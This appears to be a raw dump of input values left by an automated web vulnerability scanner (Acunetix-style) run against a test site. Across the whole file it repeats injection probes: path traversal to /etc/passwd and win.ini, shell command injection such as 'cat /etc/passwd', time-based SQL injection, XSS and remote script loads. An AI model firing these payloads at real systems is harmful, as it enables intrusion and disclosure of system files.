../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(931721)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942732)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

`cat /etc/passwd`

1

${100056+99888}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(979545)>

1

1

1

|cat /etc/passwd#

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n932208=v940833

1

1<img/src=">" onerror=alert(914578)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

iWnucqSA'

1

1<ScRiPt%20>prompt(939454)</sCripT>

"|"ld

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&lt

'"()

yhHEk3KJ')

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

\xf6<img acu onmouseover=prompt(936986) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

LjnNWdYO'))

1

1

1

1<input autofocus onfocus=prompt(926433)>

1

/etc/passwd

1

-1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hit3aP3uTA9aR.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_ERZ59 <ScRiPt >prompt(995747)</ScRiPt>

comments

-1))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

1

RHXKhIrh'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

1

1

http://www.acunetix.tst

1

1

comments/.

fMWvDS6E')

1'"()&%<ScRiPt >prompt(990185)</ScRiPt>

"&dir&"

'"

1

1

1

file:///etc/passwd

1

|dir

<!--

'"()&%<ScRiPt >prompt(933444)</ScRiPt>

Af19FuIL'))

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_919642

1

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

acu2469\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2469

1

1

1

1

acux9808\xc0\xbez1\xc0\xbcz2a\x90bcxuca9808

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(919670)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(972321)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(960792)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928730></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(975340)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(901949)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929790)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9742635*9781062)

1

1<div style=width:expression(prompt(995375))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

'+response.write(9742635*9781062)+'

1

1

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

"+response.write(9742635*9781062)+"

1

1

1

1<body onload=prompt(950568)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996996)>

1

cat /etc/passwd

1

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(993416)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

${99434+99237}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(945255)>

|cat /etc/passwd#

1

1&n947198=v919863

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<ScRiPt%20>prompt(958461)</sCripT>

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

"|"ld

!(()&&!|*|*|

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(999073) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

testasp.vulnweb.com

1

s85Dq5dW'

'

1

1

"

1<input autofocus onfocus=prompt(942479)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

T5bUxCv2')

1

http://hitKq8Brd6IUo.bxss.me/

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

dOXciRe1'))

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

&dir

comments

1

1

1_EfcSo <ScRiPt >prompt(984987)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

1

1

comments

http://www.acunetix.tst

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

-1))

1'"()&%<ScRiPt >prompt(910359)</ScRiPt>

1

1

comments/.

1

1

'"()&%<ScRiPt >prompt(941202)</ScRiPt>

115bnGCs'

|dir

<!--

1

file:///etc/passwd

1

1

1

1_962459

1

'|dir

uF8nkh9O')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

WEB-INF/web.xml

acu3775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3775

1

Bp1b9En0'))

1

1

1

WEB-INF\web.xml

1

acux7606\xc0\xbez1\xc0\xbcz2a\x90bcxuca7606

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(946236)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(911710)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(903224)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907704></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(985513)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(974940)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987423)"></g></svg>

response.write(9679969*9894730)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9679969*9894730)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(951104))>

1

1

1

"+response.write(9679969*9894730)+"

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

1<body onload=prompt(902839)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916510)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(978596)>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<img/src=">" onerror=alert(918410)>

1

-1

${100280+100105}

1

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(936634)</sCripT>

1

1

1

-1)

1

'|'ld

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

"|"ld

-1))

1&n918885=v916741

)

\xf6<img acu onmouseover=prompt(940789) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

coZ5YCun'

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(957760)>

1

TIuZne51')

1

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

60JBSOYh'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

testasp.vulnweb.com

[url=http://www.acunetix.com]website security[/url]

-1

"

1

1

1

"

1_8Qotg <ScRiPt >prompt(984435)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

http://hitUkwK4zQQTY.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1

wAJQ70GT'

1

comments

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

aYS0qV47')

file:///etc/passwd

1

1

'"

1

http://www.acunetix.tst

comments

1

"&dir&"

1'"()&%<ScRiPt >prompt(953386)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

sl2qrIDY'))

<!--

|dir

comments/.

1

1

'"()&%<ScRiPt >prompt(987226)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1_999775

1

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

acu2645\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2645

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2147\xc0\xbez1\xc0\xbcz2a\x90bcxuca2147

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(971183)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(997057)</script>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(982179)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998503></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(922996)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(983615)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929409)"></g></svg>

1

1

response.write(9570644*9588279)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(925534))>

1

1

'+response.write(9570644*9588279)+'

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9570644*9588279)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<body onload=prompt(906090)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981695)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(999158)>

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1<img/src=">" onerror=alert(975879)>

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(953660)</sCripT>

1

${100207+100457}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n918149=v935212

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

)

"|"ld

\xf6<img acu onmouseover=prompt(913603) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

QRhIzF6p'

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(923043)>

ef2BIibD')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

'"()

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

/etc/passwd

"

1

obxCybDI'))

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_GVcQ5 <ScRiPt >prompt(964217)</ScRiPt>

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

http://hitDP15nIlyHy.bxss.me/

1

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

'&dir&'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

NImbORta'

comments

1

"&dir&"

1

http://www.acunetix.tst

1

1

file:///etc/passwd

1

comments

4gIGmsMH')

1

|dir

'"

1

1'"()&%<ScRiPt >prompt(937636)</ScRiPt>

0RluEo4E'))

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(927821)</ScRiPt>

'|dir

<!--

1

1

1

WEB-INF/web.xml

1

"|dir

1

1_983103

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acu5033\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5033

1

1

1

1

../../../../../../../../../../boot.ini

1

acux10340\xc0\xbez1\xc0\xbcz2a\x90bcxuca10340

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(906436)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(968202)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(947397)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915729></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(940656)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(988106)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9605432*9158452)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998272)"></g></svg>

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9605432*9158452)+'

1<div style=width:expression(prompt(944679))>

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

"+response.write(9605432*9158452)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(984739)>

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977853)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

-1

|cat /etc/passwd#

${99319+99826}

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(911959)>

'|'ld

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img/src=">" onerror=alert(922154)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

"|"ld

-1))

1<ScRiPt%20>prompt(958058)</sCripT>

1&n955117=v949340

1some_inexistent_file_with_long_name%00.jpg

1

)

1

0s1aDxzD'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

DSmqai0l')

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(905831) //\xf6>

'

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qwpIXOli'))

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1<input autofocus onfocus=prompt(942644)>

1

/etc/passwd

1

-1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

http://hit6qbCvHd3UG.bxss.me/

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

&dir

${@print(md5(acunetix_wvs_security_test))}

1

1_lbgz3 <ScRiPt >prompt(958820)</ScRiPt>

1

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

QgMDffnk'

comments

"&dir&"

1

1

1

1

comments/.

k9POv217')

1

1

1

1

1

|dir

file:///etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(974906)</ScRiPt>

1

Qb9B0XRc'))

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1

'"()&%<ScRiPt >prompt(912607)</ScRiPt>

1

WEB-INF/web.xml

1

"|dir

1

1

1

1_917099

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

acu2182\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2182

1

1

1

../../../../../../../../../../boot.ini

1

1

acux7465\xc0\xbez1\xc0\xbcz2a\x90bcxuca7465

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931846)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(947888)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(971217)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964993></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(901682)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(980686)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9767443*9300345)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956988)"></g></svg>

1

'+response.write(9767443*9300345)+'

&cat /etc/passwd&

1<div style=width:expression(prompt(976690))>

1

1

1

"+response.write(9767443*9300345)+"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<body onload=prompt(989646)>

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956911)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(950233)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99007+100455}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1<img/src=">" onerror=alert(966075)>

1

1&n980948=v903762

-1))

1

1<ScRiPt%20>prompt(998160)</sCripT>

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1nrlXbdF'

1

1

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

sDP2yqg3')

1

\xf6<img acu onmouseover=prompt(965083) //\xf6>

!(()&&!|*|*|

testasp.vulnweb.com

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

6o2EnzDD'))

1

1<input autofocus onfocus=prompt(968098)>

'

"

1

^(#$!@#$)(()))******

'"()

/etc/passwd

1

1

"

-1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

&dir

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1_sCT3O <ScRiPt >prompt(941510)</ScRiPt>

'&dir&'

http://hits55u6DgULI.bxss.me/

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

acunetix_wvs_invalid_filename

"&dir&"

1

3SK3YcQa'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

|dir

'"

1

1

1

U8bpVCcf')

'|dir

1

file:///etc/passwd

1

comments

<!--

VFB0WPGR'))

1

1

1

"|dir

1

comments/.

1'"()&%<ScRiPt >prompt(956077)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(946895)</ScRiPt>

1

1

1

1

1

1_984580

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu5773\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5773

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux4650\xc0\xbez1\xc0\xbcz2a\x90bcxuca4650

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(949909)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(902134)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(936311)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930384></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(949769)</ScRiPt>

1

1

1

response.write(9750270*9046571)

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(903179)">

WEB-INF/web.xml

'&cat /etc/passwd&'

1

